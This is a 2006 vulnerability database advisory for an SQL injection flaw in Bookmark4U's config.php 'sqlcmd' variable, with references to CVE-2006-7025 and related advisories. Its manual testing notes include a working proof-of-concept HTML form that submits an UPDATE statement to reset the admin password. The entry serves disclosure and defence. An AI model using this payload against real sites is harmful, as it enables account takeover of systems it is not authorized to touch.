Bookmark4U config.php 'sqlcmd' Variable SQL Injection

2006-04-20T08:02:38
ID OSVDB:24795
Type osvdb
Reporter MoHaJaLi(mohajali2k4@gmail.com)
Modified 2006-04-20T08:02:38

Description

Vulnerability Description

Bookmark4U contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the config.php script not properly sanitizing user-supplied input to the 'sqlcmd' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Technical Description

While the injection occurs in the 'sqlcmd' variable, the variable 'mode' must be set to the value 'sqlexec' for the injection to occur.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Bookmark4U contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the config.php script not properly sanitizing user-supplied input to the 'sqlcmd' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

<form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php' method='post'> <tr><td align='center'> <input type='hidden' name='sqlcmd' value="# add a administrator (initial password is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE user='admin';"> <input type='hidden' name='mode' value='sqlexec'> <input type='submit' value="Execute Above (administrator's account)"> </td></tr> </form></table> <br><a href='javascript:document.location.reload();'>And Reload this page</a>.</body></html> [/code]

References:

Vendor URL: http://bookmark4u.sourceforge.net/ Secunia Advisory ID:19758 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0517.html Mail List Post: http://attrition.org/pipermail/vim/2007-February/001373.html ISS X-Force ID: 25956 FrSIRT Advisory: ADV-2006-1456 CVE-2006-7025